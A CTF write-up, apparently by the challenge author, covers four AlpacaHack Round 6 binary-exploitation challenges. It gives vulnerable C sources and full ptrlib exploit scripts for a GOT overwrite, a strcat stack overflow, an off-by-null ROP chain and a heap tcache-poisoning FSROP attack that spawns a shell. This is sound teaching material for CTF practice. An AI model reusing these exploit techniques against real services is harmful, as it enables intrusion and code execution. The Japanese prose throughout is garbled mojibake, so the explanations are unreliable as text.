ã¯ã˜ã‚ã«
AlpacaHackã¯keymoonã¨minaminaoãŒé–‹ç™ºã—ãŸCTFプラットフォームã§ã€ç¾åœ¨ã¯å€‹äººæˆ¦ã‚’メインã«ã—ãŸå®šæœŸCTFãŒé–‹å‚¬ã•ã‚Œã¦ã„ã¾ã™ã€‚ ã¾ãŸã€éŽåŽ»å¤§ä¼šã®å•é¡Œã«ã‚‚挑戦ã§ãã‚‹ãŸã‚ã€å¾©ç¿’ã«ã‚‚便利ãªã‚µã‚¤ãƒˆã§ã™ã€‚*1 今回ã®å•é¡Œã‚‚解ãç›´ã™ã“ã¨ãŒã§ãã¾ã™ã®ã§ã€å‚åŠ ã‚’é€ƒã—ãŸæ–¹ã‚‚挑戦ã—ã¦ã¿ã¦ãã ã•ã„。
↑ã“ã“ã¾ã§å®šåž‹æ–‡
inbound (57 solves)
å•é¡Œæ¦‚è¦
ã‚°ãƒãƒ¼ãƒãƒ«å¤‰æ•°ã«å®šç¾©ã•ã‚ŒãŸintåž‹é…列slotã«å€¤ã‚’1ã¤å…¥ã‚Œã‚‰ã‚Œã¾ã™ã€‚
int slot[10]; ... int main() { int index, value; setbuf(stdin, NULL); setbuf(stdout, NULL); printf("index: "); scanf("%d", &index); if (index >= 10) { puts("[-] out-of-bounds"); exit(1); } printf("value: "); scanf("%d", &value); slot[index] = value; for (int i = 0; i < 10; i++) printf("slot[%d] = %d\n", i, slot[i]); exit(0); }
プãƒã‚°ãƒ©ãƒ ã«ã¯ãƒ•ãƒ©ã‚°ã‚’出力ã™ã‚‹win関数ãŒå®šç¾©ã•ã‚Œã¦ãŠã‚Šã€ã“れを呼ã³å‡ºã™ã“ã¨ãŒç›®çš„ã§ã™ã€‚
/* Call this function! */ void win() { char *args[] = {"/bin/cat", "/flag.txt", NULL}; execve(args[0], args, NULL); exit(1); }
checksecã§ã‚»ã‚ュリティ機構を確èªã™ã‚‹ã¨ã€Partial RELRO, No canary*2, No PIEã§ã‚ã‚‹ã“ã¨ãŒç¢ºèªã§ãã¾ã™ã€‚
$ checksec ./inbound
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
SHSTK: Enabled
IBT: Enabled
Stripped: No
脆弱性
slotã«ã‚¢ã‚¯ã‚»ã‚¹ã™ã‚‹ã‚¤ãƒ³ãƒ‡ã‚¯ã‚¹ã‚’入力ã—ãŸã‚ã¨ã€ãã‚ŒãŒ10以上ã§ã‚ã‚‹å ´åˆã¯ç¯„囲外å‚ç…§ã¨ã—ã¦ãƒ—ãƒã‚°ãƒ©ãƒ を終了ã—ã¾ã™ã€‚
int index, value; ... printf("index: "); scanf("%d", &index); if (index >= 10) { puts("[-] out-of-bounds"); exit(1); }
ã—ã‹ã—ã€indexã¯intåž‹ã§å®šç¾©ã•ã‚Œã¦ã„ã‚‹ãŸã‚ã€è² æ•°ã§ã‚ã‚‹ã‹ã‚‚検査ã™ã¹ãã§ã™ã€‚
slotã‚ˆã‚Šã‚‚è² ã®æ–¹å‘ã«ä½•ãŒã‚ã‚‹ã‹ã€gdbã§ç¢ºèªã—ã¦ã¿ã¾ã—ょã†ã€‚
ã„ãã¤ã‹ã‚ã‚Šã¾ã™ãŒã€GOT (Global Offset Table)ãŒæ›¸ãæ›ãˆå¯èƒ½é ˜åŸŸ*3ã«ã‚ã‚‹ã®ãŒã‚ã‹ã‚Šã¾ã™ã€‚
ã“ã“ã«ã¯libcãªã©ã®å¤–部ライブラリã®é–¢æ•°ã‚’呼ã³å‡ºã™ã¨ãã«ä½¿ã‚れる関数ãƒã‚¤ãƒ³ã‚¿ãŒæ ¼ç´ã•ã‚Œã¦ã„ã¾ã™ã€‚
ã¤ã¾ã‚Šã€ã‚る関数ã®GOTã‚’win関数ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã§ä¸Šæ›¸ãã™ã‚‹ã¨ã€ãã®é–¢æ•°ãŒå‘¼ã°ã‚ŒãŸã¨ãã«win関数ãŒå‘¼ã³å‡ºã•ã‚Œã¾ã™ã€‚
ã“ã®ã‚ˆã†ã«GOTを書ãæ›ãˆã¦ä»»æ„ã®é–¢æ•°ã‚„ROP gadgetãªã©ã‚’呼ã³å‡ºã™æ”»æ’ƒã‚’GOT overwriteã¨å‘¼ã³ã¾ã™ã€‚
攻撃
GOT overwriteã¨ã„ã†æ–¹é‡ãŒç«‹ã£ãŸã‚‰ã€æ¬¡ã«ã©ã®é–¢æ•°ã®GOTを上書ãã™ã‚‹ã‹ã‚’決ã‚ã¾ã™ã€‚
ã¾ãšã€é–¢æ•°ãŒå‘¼ã³å‡ºã•ã‚Œã‚‹å¿…è¦ãŒã‚ã‚‹ã®ã§ã€GOTを書ãæ›ãˆãŸã‚ã¨ã«å‘¼ã³å‡ºã›ã‚‹é–¢æ•°ã§ã‚ã‚‹å¿…è¦ãŒã‚ã‚Šã¾ã™ã€‚
ソースコードを確èªã™ã‚‹ã¨ã€printfã¨exitãŒè©²å½“ã—ã¾ã™ã€‚
... slot[index] = value; for (int i = 0; i < 10; i++) printf("slot[%d] = %d\n", i, slot[i]); exit(0); }
ã§ã¯printfã®GOTã‚’win関数ã«æ›¸ãæ›ãˆã‚‹ã“ã¨ã¯ã§ãã‚‹ã§ã—ょã†ã‹ï¼Ÿ
残念ãªãŒã‚‰ä»Šå›žã®å•é¡Œã§ã¯ä½¿ãˆã¾ã›ã‚“。ãªãœãªã‚‰ã€slotã¯intåž‹ã®é…列ã ã‹ã‚‰ã§ã™ã€‚
printfã¯ãƒ—ãƒã‚°ãƒ©ãƒ ä¸ã§ã™ã§ã«ä½•åº¦ã‹å‘¼ã°ã‚Œã¦ã„ã‚‹ãŸã‚ã€libcä¸ã®printf関数ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã«è§£æ±ºã•ã‚Œã¦ã„ã¾ã™ã€‚
libcã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã¯6ãƒã‚¤ãƒˆã‚ã‚‹ãŸã‚ã€int型(4ãƒã‚¤ãƒˆï¼‰ã®æ›¸ãæ›ãˆ1度ã§ã¯ä¸å分ã§ã™ã€‚
一方ã§exitã¯ã¾ã 呼ã³å‡ºã•ã‚Œã¦ã„ãªã„ãŸã‚ã€ã‚¢ãƒ‰ãƒ¬ã‚¹ãŒè§£æ±ºã•ã‚Œã¦ã„ã¾ã›ã‚“。
今回ã®ãƒ—ãƒã‚°ãƒ©ãƒ ã¯No PIE(プãƒã‚°ãƒ©ãƒ 自身ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã¯å›ºå®šï¼‰ã§ã‚ã‚Šã€No PIEã®å ´åˆã‚¢ãƒ‰ãƒ¬ã‚¹ã¯é€šå¸¸3ãƒã‚¤ãƒˆã«åŽã¾ã‚‹ç¯„囲ã«ç½®ã‹ã‚Œã¾ã™*4。
ã—ãŸãŒã£ã¦ã€exitã®GOTã§ã‚ã‚Œã°int値ã®æ›¸ãè¾¼ã¿ã§ã‚‚win関数ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã«åˆ¶å¾¡ã™ã‚‹ã“ã¨ãŒã§ãã¾ã™ã€‚
from ptrlib import * import os HOST = os.getenv("HOST", "localhost") PORT = int(os.getenv("PORT", "9999")) elf = ELF("../distfiles/inbound") sock = Socket(HOST, PORT) sock.sendlineafter("index: ", -14) sock.sendlineafter("value: ", elf.symbol("win")) sock.sh()
catcpy (41 solves)
å•é¡Œæ¦‚è¦
ã‚°ãƒãƒ¼ãƒãƒ«ãƒãƒƒãƒ•ã‚¡ã«ãƒ‡ãƒ¼ã‚¿ã‚’入れãŸã‚ã¨ã€main関数ã®ãƒãƒ¼ã‚«ãƒ«ãƒãƒƒãƒ•ã‚¡ã«strcpyã‹strcatを使ã£ã¦ã‚³ãƒ”ーã§ãã¾ã™ã€‚
char g_buf[0x100]; ... int main() { int choice; char buf[0x100]; memset(buf, 0, sizeof(buf)); setbuf(stdin, NULL); setbuf(stdout, NULL); setbuf(stderr, NULL); puts("1. strcpy\n" "2. strcat"); while (1) { printf("> "); if (scanf("%d%*c", &choice) != 1) return 1; switch (choice) { case 1: get_data(); strcpy(buf, g_buf); break; case 2: get_data(); strcat(buf, g_buf); break; default: return 0; } } }
脆弱性
両方ã¨ã‚‚ãƒãƒƒãƒ•ã‚¡ã®ã‚µã‚¤ã‚ºã¯0x100ãªã®ã§strcpyã¯å•é¡Œã‚ã‚Šã¾ã›ã‚“。
ã—ã‹ã—ã€strcatã¯ãƒãƒƒãƒ•ã‚¡ã‚µã‚¤ã‚ºã«é–¢ä¿‚ãªããƒ‡ãƒ¼ã‚¿ã‚’ä»˜åŠ ã—ã¦ã—ã¾ã†ãŸã‚ã€ã‚¹ã‚¿ãƒƒã‚¯ãƒãƒƒãƒ•ã‚¡ã‚ªãƒ¼ãƒãƒ¼ãƒ•ãƒãƒ¼ãŒç™ºç”Ÿã—ã¾ã™ã€‚
今回ã®å•é¡Œã¯stack canaryãŒãªã„ã®ã§ã€main関数ã®ãƒªã‚¿ãƒ¼ãƒ³ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’win関数ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã«æ›¸ãæ›ãˆã‚‹ã“ã¨ã‚’目標ã«ã—ã¾ã—ょã†ã€‚
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
SHSTK: Enabled
IBT: Enabled
Stripped: No
攻撃
リターンアドレスを書ãæ›ãˆã‚‹ä¸Šã§2ã¤å•é¡ŒãŒã‚ã‚Šã¾ã™ã€‚
- NULL終端ãªã®ã§6ãƒã‚¤ãƒˆã®ãƒªã‚¿ãƒ¼ãƒ³ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’1度ã«3ãƒã‚¤ãƒˆã®
win関数ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã«ã§ããªã„ fgetsã§å…¥åŠ›ã‚’å—ã‘å–ã‚‹ãŸã‚ã€çµ‚端ã«æ”¹è¡Œã‚³ãƒ¼ãƒ‰ãŒå…¥ã£ã¦ã—ã¾ã†
1ã¤ã‚ã®å•é¡Œã¯ã€ä½•åº¦ã‹strcatを呼ã³å‡ºã™ã“ã¨ã§è§£æ±ºã§ãã¾ã™ã€‚ã¯ã˜ã‚ã«é©å½“ãªé•·ã•ã®æ–‡å—列ã§ãƒªã‚¿ãƒ¼ãƒ³ã‚¢ãƒ‰ãƒ¬ã‚¹ã®å¾ŒåŠã‚’NULLãƒã‚¤ãƒˆã‚’æ½°ã—ã€é•·ã•ã‚’1ãšã¤æ¸›ã‚‰ã—ã¦ã„ãã“ã¨ã§NULLãƒã‚¤ãƒˆã‚’後ã‚ã‹ã‚‰é€£ç¶šã—ã¦æ›¸ãè¾¼ã‚ã¾ã™ã€‚
2ã¤ã‚ã®å•é¡Œã¯ã€fgetsã«æœ€å¤§é‡ã®å…¥åŠ›ã‚’入れるã“ã¨ã§è§£æ±ºã§ãã¾ã™ã€‚fgetsã¯é€šå¸¸æ”¹è¡Œã‚³ãƒ¼ãƒ‰ã§çµ‚端ã—ã¾ã™ãŒã€ã€Œå—ã‘付ã‘る入力サイズ-1ã€ã®é•·ã•ã‚’入力ã¨ã—ã¦ä¸Žãˆã‚‹ã¨ã€æœ€å¾Œã‚’NULL終端ã¨ã—ã¦æ”¹è¡Œã‚³ãƒ¼ãƒ‰ãŒå…¥ã‚‹ã“ã¨ãªã入力ã§ãã¾ã™ã€‚
ã—ãŸãŒã£ã¦ã€ã¾ãšé©åº¦ãªé•·ã•ã®å…¥åŠ›ã§ãƒªã‚¿ãƒ¼ãƒ³ã‚¢ãƒ‰ãƒ¬ã‚¹ã®é«˜ä½ãƒ“ットをNULL埋ã‚ã—ã€æ¬¡ã«fgetsã«æœ€å¤§é‡ã®å…¥åŠ›ã‚’与ãˆã‚‹ã“ã¨ã§win関数ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’æ£ã—ã与ãˆã‚‰ã‚Œã¾ã™ã€‚
from ptrlib import * import os HOST = os.getenv("HOST", "localhost") PORT = int(os.getenv("PORT", 9999)) elf = ELF("../distfiles/catcpy") sock = Socket(HOST, PORT) # Fill with NULL for i in range(2): sock.sendlineafter("> ", "1") sock.sendlineafter("Data: ", "A"*0x7f) sock.sendlineafter("> ", "2") sock.sendlineafter("Data: ", "A"*(0x98 + (4 - i))) # Overwrite return address sock.sendlineafter("> ", "1") sock.sendlineafter("Data: ", "A"*0x1b) sock.sendlineafter("> ", "2") # Send maximum amount so that fgets will not terminate with a newline sock.sendafter("Data: ", b"A"*(0x100-4) + p32(elf.symbol("win"))[:3]) sock.sendlineafter("> ", "3") sock.sh()
wall (21 solves)
å•é¡Œæ¦‚è¦
メッセージã¨åå‰ã‚’入力ã§ãã‚‹ã ã‘ã®ãƒ—ãƒã‚°ãƒ©ãƒ ã§ã™ã€‚
#include <stdio.h> #include <stdlib.h> char message[4096]; void get_name(void) { char name[128]; printf("What is your name? "); scanf("%128[^\n]%*c", name); printf("Message from %s: \"%s\"\n", name, message); } int main(int argc, char **argv) { setbuf(stdin, NULL); setbuf(stdout, NULL); setbuf(stderr, NULL); printf("Message: "); scanf("%4096[^\n]%*c", message); get_name(); return 0; }
ã‚»ã‚ュリティ機構ã¯ã“ã‚Œã¾ã§ã®å•é¡Œã¨åŒæ§˜ã«No PIE, No canary, Partial RELROã§ã™ã€‚
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
SHSTK: Enabled
IBT: Enabled
Stripped: No
脆弱性
get_name関数を見るã¨ã€128ãƒã‚¤ãƒˆã®ãƒãƒƒãƒ•ã‚¡ã«å¯¾ã—ã¦scanfã§128ãƒã‚¤ãƒˆã®ãƒ‡ãƒ¼ã‚¿ã‚’入力ã—ã¦ã„ã¾ã™ã€‚
ã—ã‹ã—ã€scanfã§æ–‡å—列を入力ã™ã‚‹ã¨ãã¯ä¸Žãˆã‚‰ã‚ŒãŸã‚µã‚¤ã‚ºã«é–¢ä¿‚ãªãNULL終端を強è¦ã™ã‚‹ãŸã‚ã€NULLãƒã‚¤ãƒˆãŒ1ãƒã‚¤ãƒˆã ã‘ãƒãƒƒãƒ•ã‚¡ã®å¤–ã«æ›¸ãè¾¼ã‚ã¦ã—ã¾ã„ã¾ã™ã€‚
ã“ã®ã‚ˆã†ãªè„†å¼±æ€§ã‚’off-by-nullã¨å‘¼ã³ã¾ã™ã€‚
攻撃
ROP (Return Oriented Programming)
今回ã®ãƒ—ãƒã‚°ãƒ©ãƒ ã‚’gdbãªã©ã§è§£æžã™ã‚‹ã¨ã€æ›¸ãæ›ãˆã‚‰ã‚Œã‚‹ã®ã¯get_nameã®ã‚¹ã‚¿ãƒƒã‚¯ãƒ•ãƒ¬ãƒ¼ãƒ ã«ä¿å˜ã•ã‚ŒãŸrbpレジスタã§ã‚ã‚‹ã“ã¨ãŒã‚ã‹ã‚Šã¾ã™ã€‚
get_nameã¨mainã®æ©Ÿæ¢°èªžã‚’èªã‚€ã¨ã€ã„ãšã‚Œã‚‚leave; ret;命令ã§ãƒªã‚¿ãƒ¼ãƒ³ã—ã¦ã„ã¾ã™ã€‚
leave命令ã¯ä»¥ä¸‹ã®å‘½ä»¤åˆ—ã¨ç‰ä¾¡ã§ã™ã€‚
mov rsp, rbp pop rbp
ã—ãŸãŒã£ã¦ã€off-by-nullã‚’èµ·ã“ã™ã¨15/16ã®ç¢ºçŽ‡ï¼ˆã‚‚ã¨ã‚‚ã¨saved rbpã®æœ€ä¸‹ä½ãƒã‚¤ãƒˆãŒ0ã§ãªã‹ã£ãŸå ´åˆï¼‰ã§main関数ã«æˆ»ã£ãŸã¨ãã®RSPãŒå£Šã‚Œã¾ã™ã€‚
特ã«ã€saved rbpã®æœ€ä¸‹ä½ãƒã‚¤ãƒˆãŒå¤§ãã‹ã£ãŸå ´åˆã€RSPãŒæœ¬æ¥ã®å ´æ‰€ã‚ˆã‚Šå¤§ãã低ã„アドレスã«ãšã‚Œã‚‹ã“ã¨ã«ãªã‚Šã¾ã™ã€‚
低ã„アドレスã¯get_nameã®ã‚¹ã‚¿ãƒƒã‚¯ãƒ•ãƒ¬ãƒ¼ãƒ ãŒã‚ã£ãŸå ´æ‰€ã§ã‚ã‚Šã€ãã“ã«ã¯nameãƒãƒƒãƒ•ã‚¡ãŒã‚ã‚Šã¾ã™ã€‚
ã—ãŸãŒã£ã¦ã€main関数ã‹ã‚‰ãƒªã‚¿ãƒ¼ãƒ³ã™ã‚‹å†ã«get_nameã®nameãƒãƒƒãƒ•ã‚¡ä¸ã®ãƒ‡ãƒ¼ã‚¿ã‚’リターンアドレスã¨ã—ã¦è§£é‡ˆã—ã¦ã—ã¾ã†å¯èƒ½æ€§ãŒã‚ã‚Šã€ROPãŒå¯èƒ½ã§ã™ã€‚
nameãƒãƒƒãƒ•ã‚¡ã®ä¸è¦ãªç®‡æ‰€ã«ã¯ret命令ã®gadgetã‚’æ•·ãè©°ã‚ã¦ãŠãã“ã¨ã§ã€ãã®å‘¨è¾ºã®ã©ã“ã‹ã‚‰ROPãŒå§‹ã¾ã£ã¦ã‚‚ret命令ã®éƒ¨åˆ†ã¯ã‚¹ã‚ップã•ã‚Œã‚‹ãŸã‚ã€ROPã®æˆåŠŸç¢ºçŽ‡ãŒä¸ŠãŒã‚Šã¾ã™ã€‚
Libcリーク
è¿‘å¹´ã¯pop rdi; ret; gadgetãŒãªããªã£ã¦ã—ã¾ã£ãŸãŸã‚ã€pop rbp; ret; gadgetã§libcã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’リークをã—ã¾ã—ょã†ã€‚
ãƒãƒ¼ã‚«ãƒ«å¤‰æ•°ã‚’出力ã™ã‚‹ç®‡æ‰€ã§ã¯rbpãŒä½¿ã‚れるã®ã§ã€get_nameã®å‡ºåŠ›ç®‡æ‰€ã‚’対象ã«ã—ã¾ã—ãŸã€‚
rbp-0x80ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’引数ã«æ¸¡ã—ã¦ã„ã‚‹ã®ã§ã€ãƒªãƒ¼ã‚¯ã—ãŸã„アドレス+0x80ã‚’rbpã«è¨å®šã—ã¦ã“ã“を呼ã³å‡ºã›ã°è‰¯ã„ã§ã™ã€‚
GOT overwrite
Libcã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’リークã—ãŸã‚‰å†åº¦mainã«æˆ»ã£ã¦ROPã‚’ã—ãŸã„ã¨ã“ã‚ã§ã™ãŒã€ç¾åœ¨ã®ã‚¹ã‚¿ãƒƒã‚¯ãƒã‚¤ãƒ³ã‚¿ãŒBSSを指ã—ã¦ã„ã‚‹ãŸã‚難ã—ã„ã§ã™ã€‚
printfãŒã‹ãªã‚Šã®é‡ã®ã‚¹ã‚¿ãƒƒã‚¯ã‚’使ã†ãŸã‚ã€ã©ã†ã—ã¦ã‚‚èªã¿è¾¼ã¿å°‚ç”¨é ˜åŸŸã«ã‚¹ã‚¿ãƒƒã‚¯ãƒã‚¤ãƒ³ã‚¿ãŒç§»å‹•ã—ã¦ã—ã¾ã„ã¾ã™ã€‚
ãã“ã§ã€Partial RELROã§ã‚る特性を使ã£ã¦GOT overwriteã™ã‚‹ã“ã¨ã‚’考ãˆã¾ã™ã€‚
Libcリークã¨åŒæ§˜ã«ã€scanfã®å°‘ã—å‰ã‹ã‚‰å‘¼ã³å‡ºã™ã“ã¨ã§è‡ªç”±ãªã‚¢ãƒ‰ãƒ¬ã‚¹ã«scanfã§ãƒ‡ãƒ¼ã‚¿ã‚’書ã込むã“ã¨ã‚‚ã§ãã¾ã™ã€‚
想定解ã®exploitã§ã¯setbuf関数ã®GOTã‚’system関数ã«ç½®ãæ›ãˆã€stderrã®å ´æ‰€ã«å‘¼ã³å‡ºã—ãŸã„コマンドを書ã込んã§ã„ã¾ã™ã€‚
ã“ã‚Œã«ã‚ˆã‚Šã€ã‚¹ã‚¿ãƒƒã‚¯ã‚’対象ã«æ¶ˆè²»ã™ã‚‹ã“ã¨ãªãsystem関数を呼ã³å‡ºã›ã¾ã™ã€‚
Exploitコード
以下ãŒæƒ³å®šè§£ã®exploit例ã«ãªã‚Šã¾ã™ã€‚
from ptrlib import * import os HOST = os.getenv("HOST", "localhost") PORT = int(os.getenv("PORT", 9999)) libc = ELF("../distfiles/libc.so.6") elf = ELF("../distfiles/wall") while True: sock = Socket(HOST, PORT) rop = p64(next(elf.gadget("pop rbp; ret;"))) rop += p64(elf.got("setbuf") + 0x80) rop += p64(0x401196) payload = p64(next(elf.gadget("ret"))) * ((4096 - len(rop)) // 8) payload += rop assert b"\n" not in payload sock.sendlineafter(": ", payload) rop = p64(next(elf.gadget("pop rbp; ret;"))) rop += p64(elf.got("printf") + 0x80) rop += p64(0x4011b1) payload = p64(next(elf.gadget("ret"))) * ((0x80 - len(rop)) // 8) payload += rop assert b"\n" not in payload sock.sendlineafter("? ", payload) sock.recvline() try: r = sock.recvregex("from (.+): \"", timeout=0.5) except (TimeoutError, ConnectionResetError): logger.warning("Bad luck!") continue libc.base = u64(r[0]) - libc.symbol("printf") payload = p64(libc.symbol("system")) # setbuf@got -> system payload += p64(elf.symbol("main")) # printf@got -> main payload += p64(0) * 6 payload += p64(libc.symbol("_IO_2_1_stdout_")) + p64(0) payload += p64(libc.symbol("_IO_2_1_stdin_")) + p64(0) payload += p64(next(libc.find("/bin/sh"))) assert b"\n" not in payload sock.sendline(payload) sock.sendline("cat /flag*") sock.sh() break
スタックã®æ¶ˆè²»ã‚’回é¿ã™ã‚‹ã¨ã„ã†è¤‡é›‘ãªexploitã ã£ãŸãŸã‚作å•å½“時ã¯hard想定ã§ã—ãŸãŒã€ã‚ˆã‚Šç°¡å˜ã«libc leakã§ãる方法ãŒã‚ã‚‹ãŸã‚レビュー段階ã§mediumã«ä¸‹ãŒã£ãŸã‚ˆã†ã§ã™ã€‚ ã™ã§ã«writeupã‚’AlpacaHackã«æŠ•ç¨¿ã—ã¦ãã‚Œã¦ã„る方もã„るよã†ãªã®ã§ã€ç°¡å˜ãªæ–¹æ³•ã«ã¤ã„ã¦ã¯è§£ã„ã¦ãã‚ŒãŸæ–¹ã®writeupを是éžèªã‚“ã§ã¿ã¦ãã ã•ã„。
Writeups - AlpacaHack Round 6 (Pwn)
ideabook (10 solves)
å•é¡Œæ¦‚è¦
最後ã¯ã‚ˆãã‚ã‚‹noteå½¢å¼ã®ãƒ’ープå•ã§ã™ã€‚ noteã®ã‚µã‚¤ã‚ºã¨ãƒã‚¤ãƒ³ã‚¿ã¯ã‚°ãƒãƒ¼ãƒãƒ«å¤‰æ•°ã§ç®¡ç†ã•ã‚Œã¦ã„ã¾ã™ã€‚
unsigned short size_list[MAX_NOTE]; unsigned char *note_list[MAX_NOTE];
ã“ã‚Œã«å¯¾ã—ã¦create, edit, read, deleteã®4ã¤ã®æ©Ÿèƒ½ãŒã‚ã‚Šã¾ã™ã€‚
脆弱性
noteã®ã‚¤ãƒ³ãƒ‡ã‚¯ã‚¹ã‚’å–å¾—ã™ã‚‹ã¨ãã€ä»¥ä¸‹ã®ã‚ˆã†ã«ã‚¤ãƒ³ãƒ‡ã‚¯ã‚¹ã‚’検査ã—ã¦ã„ã¾ã™ã€‚
size_t get_index() { size_t idx; idx = get_val("Index: "); if (idx > sizeof(size_list)) { puts("[-] Invalid index"); exit(1); } return idx; }
é…列ã«å¯¾ã™ã‚‹sizeofã¯é…列ã®é•·ã•ã‚’è¿”ã™ã®ã§ã¯ãªãã€ãƒ‡ãƒ¼ã‚¿ã‚µã‚¤ã‚ºã‚’è¿”ã™ãŸã‚ã€ç¯„囲外å‚ç…§ãŒç™ºç”Ÿã—ã¾ã™ã€‚
(本æ¥ã¯>=ã§ã‚ã‚‹ã¹ãã¨ã“ã‚ãŒ>ã«ãªã£ã¦ã„ã‚‹ã®ã‚‚å•é¡Œã§ã™ã€‚)
メモリを確èªã™ã‚‹ã¨ã€size_listã¯æ¬¡ã®ã‚ˆã†ã«ãªã£ã¦ã„ã¾ã™ã€‚
å„è¦ç´ ã®åž‹ã¯unsigned shortã®2ãƒã‚¤ãƒˆã§ã€ã“ã®ãƒ¡ãƒ¢ãƒªãƒ¬ã‚¤ã‚¢ã‚¦ãƒˆã§ã¯note_list[0]ã®ä¸‹ä½2ãƒã‚¤ãƒˆã‚’書ãæ›ãˆã‚‰ã‚Œã¦ã—ã¾ã„ã¾ã™ã€‚
ã¾ãŸå対ã«ã€note_list[0]をセットã™ã‚‹ã“ã¨ã§ã‚¤ãƒ³ãƒ‡ã‚¯ã‚¹=16ã®ã‚µã‚¤ã‚ºãŒå£Šã‚Œã¾ã™ã€‚
攻撃
ã¾ãšã‚¤ãƒ³ãƒ‡ã‚¯ã‚¹=16ã«ã‚µã‚¤ã‚º0ã®noteを作りã¾ã™ã€‚ãã®å¾Œã‚¤ãƒ³ãƒ‡ã‚¯ã‚¹=0ã«é©å½“ãªãƒ‡ãƒ¼ã‚¿ã‚’作るã“ã¨ã§ã€ã‚¤ãƒ³ãƒ‡ã‚¯ã‚¹=16ã®ã‚µã‚¤ã‚ºãŒå£Šã‚Œã€ãƒ’ープãƒãƒƒãƒ•ã‚¡ã‚ªãƒ¼ãƒãƒ¼ãƒ•ãƒãƒ¼ãŒç™ºç”Ÿã—ã¾ã™ã€‚
想定解ã®ã‚¨ã‚¯ã‚¹ãƒ—ãƒã‚¤ãƒˆã§ã¯ã“ã®ãƒ’ープãƒãƒƒãƒ•ã‚¡ã‚ªãƒ¼ãƒãƒ¼ãƒ•ãƒãƒ¼ã‚’起点ã«libc leakã‚„tcache poisoningã‚’ã—ã¾ã—ãŸã€‚ (当然ã€ãƒã‚¤ãƒ³ã‚¿ã‚’壊ã™æ–¹å‘ã§ã‚‚exploitã¯å¯èƒ½ã§ã™ãŒã€ã‚ªãƒ¼ãƒãƒ¼ãƒ•ãƒãƒ¼ã®æ–¹ãŒç°¡å˜ãªã®ã§ã“ã¡ã‚‰ã‚’é¸ã³ã¾ã—ãŸã€‚)
Tcacheã®ãƒªãƒ³ã‚¯ãƒªã‚¹ãƒˆã‚’ç ´å£Šã—ãŸã‚‰ã€stderrã«å‘ã‘ã‚‹ã“ã¨ã§stderrã‚’ç ´å£Šã—ã€FSROPã«ã‚ˆã‚Šã‚·ã‚§ãƒ«ã‚’å–ã£ã¦ã„ã¾ã™ã€‚
from ptrlib import * import os HOST = os.getenv("HOST", "localhost") PORT = int(os.getenv("PORT", "9999")) def create(index, size): sock.sendlineafter("> ", "1") sock.sendlineafter(": ", index) sock.sendlineafter(": ", size) def edit(index, data): sock.sendlineafter("> ", "2") sock.sendlineafter(": ", index) sock.sendlineafter(": ", data) def read(index): sock.sendlineafter("> ", "3") sock.sendlineafter(": ", index) sock.recvuntil("Content: ") return sock.recvuntil("> ", drop=True, lookahead=True) def delete(index): sock.sendlineafter("> ", "4") sock.sendlineafter(": ", index) #libc = ELF("/usr/lib/x86_64-linux-gnu/libc.so.6") #sock = Process("./chall") libc = ELF("../distfiles/libc.so.6") sock = Socket(HOST, PORT) # Leak heap create(16, 0x00) create(0, 0x18) create(1, 0x18) delete(1) create(2, 0x100) create(3, 0x100) create(4, 0x100) create(5, 0x100) edit(5, p64(0x21) * (0x100//8 - 1)) # fake chunk size leak = read(16) heap_base = u64(leak[0x40:0x48]) << 12 logger.info("heap = " + hex(heap_base)) # Leak libc create(1, 0x18) edit(16, b"A"*0x18 + p64(0x21) + b"B"*0x18 + p64(0x421)) # overwrite chunk size delete(1) # link to unsortedbin leak = read(16) libc.base = u64(leak[0x40:0x48]) - libc.main_arena() - 0x60 # Corrupt tcache link create(6, 0xe0) create(7, 0xe0) delete(7) delete(6) target = libc.symbol("_IO_2_1_stderr_") edit(16, b"A"*0x18 + p64(0x21) + b"B"*0x18 + p64(0xf1) + p64(target ^ (heap_base >> 12))) # Overwrite stderr create(6, 0xe0) create(7, 0xe0) payload = p32(0xfbad0101) + b";sh\0" # fp->_flags & _IO_UNBUFFERED == 0) payload += b"\x00" * (0x58 - len(payload)) payload += p64(libc.symbol("system")) # vtable->iowalloc payload += b"\x00" * (0x88 - len(payload)) payload += p64(libc.symbol("_IO_2_1_stderr_") - 0x10) # _wide_data (1) payload += b"\x00" * (0xa0 - len(payload)) payload += p64(libc.symbol("_IO_2_1_stderr_") - 0x10) # _wide_data (1) payload += b"\x00" * (0xc0 - len(payload)) payload += p32(1) # fp->_mode != 0 payload += b"\x00" * (0xd0 - len(payload)) payload += p64(libc.symbol("_IO_2_1_stderr_") - 0x10) # (1) _wide_data->vtable payload += p64(libc.symbol("_IO_wfile_jumps") + 0x18 - 0x58) # _IO_wfile_jumps + delta edit(7, payload[:-1]) sock.sendlineafter("> ", "5") sock.sendline("cat /flag*") sock.sh()
*1:CTFã¯æ™®é€šå¤§ä¼šãŒçµ‚ã‚ã‚‹ã¨å•é¡Œãƒ•ã‚¡ã‚¤ãƒ«ã‚„サーãƒãƒ¼ãŒåœæ¢ã—ã¦ã—ã¾ã„解ãç›´ã—ãŒé›£ã—ã„ã®ã§ã€ã“ã‚Œã¯ã‚ã‚ŠãŒãŸã„機能
*2:ãƒãƒ¼ã‚«ãƒ«å¤‰æ•°ã§é…列ãªã©ã‚’使ã£ã¦ã„ãªã„å ´åˆã€gccã®åˆ¤æ–ã§è‡ªå‹•çš„ã«ç„¡åŠ¹åŒ–ã•ã‚Œã¾ã™
*3:Full RELROã§ãªã‘ã‚Œã°æ›¸ãæ›ãˆå¯èƒ½ã§ã™
